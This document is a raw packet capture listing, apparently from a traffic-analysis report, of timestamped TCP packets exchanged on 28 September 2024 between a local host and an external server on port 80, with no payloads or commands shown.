                                                                    Sep 28, 2024 17:52:13.254729033 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.254736900 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.254843950 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:13.255331039 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.255356073 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.255372047 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.255395889 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.255409002 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:13.255414009 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.255423069 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:13.255450010 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:13.256238937 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.256253958 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.256275892 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.256292105 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.256298065 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:13.256311893 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.256313086 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:13.256329060 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.256344080 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:13.256345034 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.256364107 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.256392002 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:13.256421089 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:13.256421089 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:13.257148981 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.257164001 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.257180929 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.257194996 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.257205009 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:13.257211924 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.257241011 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:13.257263899 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:13.258110046 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.258126020 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.258177996 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:13.343251944 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.343286037 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.343352079 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:13.343410015 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:13.389256001 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.389275074 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.389292002 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.389406919 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:13.389620066 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.389636040 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.389652967 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.389677048 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:13.389719963 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:13.390151978 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.390167952 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.390188932 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.390203953 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.390223026 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:13.390260935 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:13.390583038 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.390598059 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.390614986 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.390641928 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:13.390671015 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:13.390743971 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.390759945 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.390777111 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.390789986 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:13.390825033 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:13.391648054 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.391663074 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.391678095 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.391691923 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.391706944 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.391710043 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:13.391748905 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:13.391813993 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.391829967 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.391845942 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.391860008 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:13.391861916 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.391892910 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:13.391921043 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:13.392425060 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.392441034 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.392501116 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:13.392913103 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.392927885 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.392942905 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.393002987 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:13.393002987 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:13.393228054 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.393244028 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.393253088 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.393301964 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:13.393342018 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:13.393909931 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.393924952 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.393940926 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.393955946 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.393965006 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:13.393987894 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:13.394020081 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:13.394789934 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.394821882 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.394838095 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.394853115 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.394855022 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:13.394871950 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.394889116 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.394893885 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:13.394906998 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.394922018 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:13.394922972 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.394942045 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:13.394972086 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:13.395806074 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.395873070 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:13.476243973 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.476262093 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.476277113 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.476423979 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:13.476701021 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:13.478054047 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.478120089 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:13.478126049 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.478172064 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:13.510930061 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.510950089 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.510965109 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.511055946 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:13.511107922 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.511122942 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.511147976 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.511153936 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:13.511162996 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.511173964 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:13.511181116 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.511190891 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:13.511204958 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.511209965 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:13.511221886 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.511238098 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.511248112 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:13.511255026 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.511367083 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.511389971 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.511404991 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.511445045 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:13.511445999 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:13.511445999 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:13.511491060 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:13.511492014 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:13.511492014 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:13.511951923 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.512020111 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:13.512109995 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.512125015 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.512140036 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.512154102 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.512159109 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:13.512171030 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.512175083 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:13.512187958 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.512207985 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:13.512234926 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:13.512240887 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.512255907 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.512273073 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.512284994 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:13.512300014 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:13.512320042 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:13.512902975 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.512928963 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.512944937 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.512957096 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:13.512973070 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:13.512989044 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:13.512993097 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.513010979 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.513025999 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.513036013 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:13.513041973 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.513056040 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:13.513060093 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.513071060 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:13.513075113 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.513087988 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:13.513092041 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.513108015 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:13.513130903 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:13.513950109 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.513966084 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.513982058 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.513997078 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.514003038 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:13.514005899 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.514014006 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.514031887 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:13.514038086 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.514054060 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.514054060 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:13.514070034 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.514080048 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:13.514086008 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.514110088 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:13.514137030 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:13.514908075 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.514923096 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.514946938 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.514959097 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:13.514961958 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.514972925 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:13.514981031 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.514996052 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.514997005 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:13.515008926 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:13.515012980 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.515027046 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.515028954 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:13.515043974 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.515047073 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:13.515063047 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.515070915 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:13.515094995 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:13.515120029 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:13.515784979 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.515800953 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.515815020 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.515830040 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.515840054 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:13.515846014 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.515858889 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:13.515870094 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.515887022 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.515894890 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:13.515902996 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.515911102 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:13.515921116 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.515935898 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.515940905 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:13.515969038 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:13.515995026 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:13.516702890 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.516717911 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.516733885 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.516748905 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.516765118 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.516769886 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:13.516781092 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.516798019 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.516801119 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:13.516832113 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:13.516846895 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:13.516879082 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.516895056 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.516922951 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:13.516937971 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:13.564665079 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.564682007 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.564696074 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.564804077 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:13.564842939 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:13.564889908 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.564903975 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.564918995 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.564935923 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:13.564951897 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:13.564969063 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:13.566384077 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.566400051 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.566414118 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.566459894 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:13.566513062 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:13.599539042 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.599555016 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.599569082 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.599584103 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.599601984 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.599617004 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.599632978 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.599647045 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.599663973 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:13.599694967 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.599710941 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.599720955 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:13.599729061 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.599744081 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.599745035 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:13.599761009 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.599772930 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:13.599777937 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.599800110 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.599802017 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:13.599813938 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.599822998 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:13.599850893 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:13.599864006 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:13.640288115 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.640306950 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.640324116 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.640352011 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.640352011 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:13.640376091 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.640377998 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:13.640393019 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.640400887 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:13.640409946 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.640422106 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:13.640425920 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.640438080 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:13.640441895 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.640456915 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.640461922 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:13.640485048 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:13.640503883 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:13.640633106 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.640647888 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.640664101 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.640676975 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:13.640695095 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:13.640712976 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:13.641088009 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.641135931 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:13.641218901 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.641232014 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.641263008 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:13.641280890 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:13.641455889 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.641472101 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.641505957 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:13.641519070 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:13.641660929 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.641705990 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:13.641843081 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.641885996 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:13.641911030 CEST804973084.201.150.223192.168.2.4
